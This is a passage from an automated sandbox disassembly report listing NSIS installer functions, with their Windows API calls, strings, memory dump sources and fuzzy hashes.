Opcode Fuzzy Hash: 8a9ae112f1df4d10fa1381c7e2026d7722a962e20b7826b4dde34b5403f790f5
Instruction Fuzzy Hash: 8961E5B1A40209BFEB109F60DD45F6A7B78FB44741F10403AFB05BA2D1C7B8A951CB99

Function 004058F5 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421A68,NUL,?,00000000,?,00000000,?,00405A99,?,?,?,0040563C,?,00000000,000000F1,?), ref: 00405905
CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00405A99,?,?,?,0040563C,?,00000000,000000F1,?), ref: 00405929
GetShortPathNameA.KERNEL32(00000000,00421A68,00000400), ref: 00405932

Part of subcall function 004057B3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057C3
Part of subcall function 004057B3: lstrlenA.KERNEL32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057F5

GetShortPathNameA.KERNEL32(?,00421E68,00000400), ref: 0040594F
wsprintfA.USER32 ref: 0040596D
GetFileSize.KERNEL32(00000000,00000000,00421E68,C0000000,?,00421E68,?,?,?,?,?), ref: 004059A8
GlobalAlloc.KERNEL32(?,0000000A), ref: 004059B7
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059EF
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421668,00000000,-0000000A,00409388,00000000,[Rename],00000000,00000000,00000000), ref: 00405A45
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A57
GlobalFree.KERNEL32(00000000), ref: 00405A5E
CloseHandle.KERNEL32(00000000), ref: 00405A65

Part of subcall function 0040584E: GetFileAttributesA.KERNEL32(00000003,00402C69,0042AC00,80000000,00000003), ref: 00405852
Part of subcall function 0040584E: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405874

Strings

%s=%s, xrefs: 00405963
NUL, xrefs: 004058FF
[Rename], xrefs: 004059D7, 004059E9

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 1265525490-4148678300
Opcode ID: 01610d3528054899f1ac5029cf9f41fed3e8ea2be33839406827397d3c09c535
Instruction ID: e8cacc7e92f5bf2d1a44c635cad04a40df604100f7174d9fb2de66c5d7927451
Opcode Fuzzy Hash: 01610d3528054899f1ac5029cf9f41fed3e8ea2be33839406827397d3c09c535
Instruction Fuzzy Hash: 60410171704B19BFD3206B215C89F6B3A5CDB45714F14023ABD01F62D2D67CA8018E7E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422EE0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5

Function 004042B1 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404300
SetWindowTextA.USER32(00000000,?), ref: 0040432A
SHBrowseForFolderA.SHELL32(?,0041F0B0,?), ref: 004043DB
CoTaskMemFree.OLE32(00000000), ref: 004043E6
lstrcmpiA.KERNEL32(00422680,0041FCD8), ref: 00404418
lstrcatA.KERNEL32(?,00422680), ref: 00404424
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404436

Part of subcall function 004053B5: GetDlgItemTextA.USER32(?,?,00000400,0040446D), ref: 004053C8

Part of subcall function 00405E28: CharNextA.USER32(?,*?|<>/":,00000000,00429000,0042A400,0042A400,00000000,0040308E,0042A400,75573410,00403268), ref: 00405E80
Part of subcall function 00405E28: CharNextA.USER32(?,?,?,00000000), ref: 00405E8D
Part of subcall function 00405E28: CharNextA.USER32(?,00429000,0042A400,0042A400,00000000,0040308E,0042A400,75573410,00403268), ref: 00405E92
Part of subcall function 00405E28: CharPrevA.USER32(?,?,0042A400,0042A400,00000000,0040308E,0042A400,75573410,00403268), ref: 00405EA2

GetDiskFreeSpaceA.KERNEL32(0041ECA8,?,?,0000040F,?,0041ECA8,0041ECA8,?,00000000,0041ECA8,?,?,000003FB,?), ref: 004044F3
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040450E

Part of subcall function 00404667: lstrlenA.KERNEL32(0041FCD8,0041FCD8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404582,000000DF,00000000,00000400,?), ref: 00404705
Part of subcall function 00404667: wsprintfA.USER32 ref: 0040470D
Part of subcall function 00404667: SetDlgItemTextA.USER32(?,0041FCD8), ref: 00404720

Strings

A, xrefs: 004043D4

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: a4e6f5f74388a77f828b1d624dc2ce04f5575212d3a06206028d13ac6567222f
Instruction ID: bbf5d18d822f9ae48c727ed4067559616aa27203017815afcead8a6077e661fe
Opcode Fuzzy Hash: a4e6f5f74388a77f828b1d624dc2ce04f5575212d3a06206028d13ac6567222f
Instruction Fuzzy Hash: 26A172B1900208ABDB11DFA6CD45BAF77B8EF84315F10843BF605B62D1D77C9A418B69

Function 00405BDF Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,0041F4B8,00000000,00404EDE,0041F4B8,00000000), ref: 00405C90
GetSystemDirectoryA.KERNEL32(00422680,00000400), ref: 00405D0B
GetWindowsDirectoryA.KERNEL32(00422680,00000400), ref: 00405D1E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405D5A
SHGetPathFromIDListA.SHELL32(?,00422680), ref: 00405D68
CoTaskMemFree.OLE32(?), ref: 00405D73
lstrcatA.KERNEL32(00422680,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D95
lstrlenA.KERNEL32(00422680,?,0041F4B8,00000000,00404EDE,0041F4B8,00000000), ref: 00405DE7

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CDA
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D8F

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: 4fc9a2c1a562770659ff824627d27c8fdf30e9a3a95352a1e28ae8e8292bb4a1
Instruction ID: 05ce3077703b195791b94b96109b54625272672628b9f98d23919b5af99ad588
Opcode Fuzzy Hash: 4fc9a2c1a562770659ff824627d27c8fdf30e9a3a95352a1e28ae8e8292bb4a1
Instruction Fuzzy Hash: 0A610171A04A05AAEB205F24DC88BBF7BB4EF11304F50813BE941B62D0D27D5982DF8E

Function 00402C29 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402C3A
GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402C56

Part of subcall function 0040584E: GetFileAttributesA.KERNEL32(00000003,00402C69,0042AC00,80000000,00000003), ref: 00405852
Part of subcall function 0040584E: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405874

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402CA2

Strings

soft, xrefs: 00402D17
Inst, xrefs: 00402D0E
Null, xrefs: 00402D20
Error launching installer, xrefs: 00402C79
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E01

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-1074636621
Opcode ID: d2466c366b40ada891166ae0be508241e2a39c3b047db90d9cb12df27967870f
Instruction ID: f25878a385a50b793721b7c2dc62060375717e7a9e735ffe9872fd5df72a7917
Opcode Fuzzy Hash: d2466c366b40ada891166ae0be508241e2a39c3b047db90d9cb12df27967870f
Instruction Fuzzy Hash: 7651F671A00215ABDB20AF65DE89F9E7BB8EB04315F10413BF904B62D1D7BC9E418B9D

Function 00402E62 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402EC0
GetTickCount.KERNEL32 ref: 00402F41
MulDiv.KERNEL32(7FFFFFFF,?,00000020), ref: 00402F6E
wsprintfA.USER32 ref: 00402F7E
WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00402FAA

Strings

... %d%%, xrefs: 00402F78

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%
API String ID: 4209647438-2449383134
Opcode ID: a547bbf75e58521e9f16cca8f90ae094bf7d1ef88360610581a7ff50affa0a35
Instruction ID: 884de2ce8814a110384bf9455658e7085e50030da519773910f3f0b9c7b3960d
Opcode Fuzzy Hash: a547bbf75e58521e9f16cca8f90ae094bf7d1ef88360610581a7ff50affa0a35
Instruction Fuzzy Hash: 49519D7190120AABCF10DF65DA08A9F3BB8AB04395F14413BF800B72C0C7789E50DBAA

Function 00403EDA Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403EF7
GetSysColor.USER32(00000000), ref: 00403F13
SetTextColor.GDI32(?,00000000), ref: 00403F1F
SetBkMode.GDI32(?,?), ref: 00403F2B
GetSysColor.USER32(?), ref: 00403F3E
SetBkColor.GDI32(?,?), ref: 00403F4E
DeleteObject.GDI32(?), ref: 00403F68
CreateBrushIndirect.GDI32(?), ref: 00403F72

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction ID: d122295a95d7a35518708bb3646b4b032600d4a0088814026e1a2530b61c3467
Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction Fuzzy Hash: 04218471904705ABC7219F68DD08B4BBFF8AF01715F048A29E996E22E1D738EA44CB55

Function 00404EA6 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0041F4B8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
lstrlenA.KERNEL32(00402F92,0041F4B8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
lstrcatA.KERNEL32(0041F4B8,00402F92,00402F92,0041F4B8,00000000,?,00000000), ref: 00404F02
SetWindowTextA.USER32(0041F4B8,0041F4B8), ref: 00404F14
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 48123c3549f50a0c2ac230125184ebffb3dcbe2344fee158779a2bcc95f67cce
Instruction ID: c9e29023339c79119f92ef6614343089cfde3ac0fe0689c8293f17bbb72fca3e
Opcode Fuzzy Hash: 48123c3549f50a0c2ac230125184ebffb3dcbe2344fee158779a2bcc95f67cce
Instruction Fuzzy Hash: D0219DB2900118BEDF119FA5CD849DEBFB9EF44354F14807AF944B6291C3789E418BA8

Function 00404771 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040478C
GetMessagePos.USER32 ref: 00404794
ScreenToClient.USER32(?,?), ref: 004047AE
SendMessageA.USER32(?,00001111,00000000,?), ref: 004047C0
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047E6

Strings

f, xrefs: 004047C2

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction ID: 7320c3ca21a199b12554e0b126592fdbaa3119cb9dfe1c5a5544a419b0626cb6
Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction Fuzzy Hash: 7B019275D00218BADB00DB94DC85FFEBBBCAF45711F10412BBA11B71C0C3B465018BA5

Function 00402B42 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B5D
MulDiv.KERNEL32(?,?,?), ref: 00402B88
wsprintfA.USER32 ref: 00402B98
SetWindowTextA.USER32(?,?), ref: 00402BA8
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBA

Strings

verifying installer: %d%%, xrefs: 00402B92

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: d52c56e719e4219fdd43886dfdce69e46e01ec9783aaea218270728fc191bd97
Instruction ID: 2a4a5d9d20a729fd9d452e33c08772ea7119627e62a29752c404fbbb79c7976e
Opcode Fuzzy Hash: d52c56e719e4219fdd43886dfdce69e46e01ec9783aaea218270728fc191bd97
Instruction Fuzzy Hash: 5601F471940209BBDF14AF60DD49EAE3779BB04345F008039FA06B52D0D7B9A955CB59

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,?), ref: 00401F93

Part of subcall function 00404EA6: lstrlenA.KERNEL32(0041F4B8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
Part of subcall function 00404EA6: lstrlenA.KERNEL32(00402F92,0041F4B8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
Part of subcall function 00404EA6: lstrcatA.KERNEL32(0041F4B8,00402F92,00402F92,0041F4B8,00000000,?,00000000), ref: 00404F02
Part of subcall function 00404EA6: SetWindowTextA.USER32(0041F4B8,0041F4B8), ref: 00404F14
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62

LoadLibraryExA.KERNEL32(00000000,?,?,?,?), ref: 00401FA3
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,?,?), ref: 0040201D

Strings

`7B, xrefs: 00401FDD

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: `7B
API String ID: 2987980305-3208876730
Opcode ID: 3eeaf95b022f53a32a81041e378aea9a7f1b0ca266dfd8a229483f2181eced64
Instruction ID: aaf5afebff6e040c8f3edcccfb20df8df5b0ecb9331c565b7beb057a01dbb2d2
Opcode Fuzzy Hash: 3eeaf95b022f53a32a81041e378aea9a7f1b0ca266dfd8a229483f2181eced64
Instruction Fuzzy Hash: 9121F672904211B6CF107FA48E8DA6E39B0AB44318F20823BF600B62D0D7BC4941DA5E

Function 00405E28 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,00429000,0042A400,0042A400,00000000,0040308E,0042A400,75573410,00403268), ref: 00405E80
CharNextA.USER32(?,?,?,00000000), ref: 00405E8D
CharNextA.USER32(?,00429000,0042A400,0042A400,00000000,0040308E,0042A400,75573410,00403268), ref: 00405E92
CharPrevA.USER32(?,?,0042A400,0042A400,00000000,0040308E,0042A400,75573410,00403268), ref: 00405EA2

Strings

*?|<>/":, xrefs: 00405E70

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 936ec53846ae3d4c979f0b86072daa16fddb5806f2a9e6e631d156a7122fd3c6
Instruction ID: a4a2cc105071513804232ace241bb9437e981183223a596247e33b0ed04e6b88
Opcode Fuzzy Hash: 936ec53846ae3d4c979f0b86072daa16fddb5806f2a9e6e631d156a7122fd3c6
Instruction Fuzzy Hash: F111C461805B9129FB3217248C44B776F89CB96B60F18047BE5C4B22C3D77C5E428EAD

Function 0040173F Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(00000000,00000000,004093B0,00429800,00000000,00000000,00000031), ref: 0040177E
CompareFileTime.KERNEL32(-00000014,?,004093B0,004093B0,00000000,00000000,004093B0,00429800,00000000,00000000,00000031), ref: 004017A8

Part of subcall function 00405BBD: lstrcpynA.KERNEL32(?,?,00000400,00403126,00422EE0,NSIS Error), ref: 00405BCA

Part of subcall function 00404EA6: lstrlenA.KERNEL32(0041F4B8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
Part of subcall function 00404EA6: lstrlenA.KERNEL32(00402F92,0041F4B8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
Part of subcall function 00404EA6: lstrcatA.KERNEL32(0041F4B8,00402F92,00402F92,0041F4B8,00000000,?,00000000), ref: 00404F02
Part of subcall function 00404EA6: SetWindowTextA.USER32(0041F4B8,0041F4B8), ref: 00404F14
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 90123a7a23cf7e657b86724a437a277d4c4849d416a3389a651f0a55611c47c9
Instruction ID: 209590ddbc3a68456c4598a6b25cf33bb68440e8bdc93e33a46783fb3c58ae9b
Opcode Fuzzy Hash: 90123a7a23cf7e657b86724a437a277d4c4849d416a3389a651f0a55611c47c9
Instruction Fuzzy Hash: 6F41C472900514BADF10BBA9DC46EAF3679EF01368F20823BF512F10E1D77C5A418AAD

Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
RegCloseKey.ADVAPI32(?), ref: 00402AA3
RegCloseKey.ADVAPI32(?), ref: 00402AC8
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 82858c02e32d41fd7ca38c30764bbd1566dd555d0b274e926b0c66c461654363
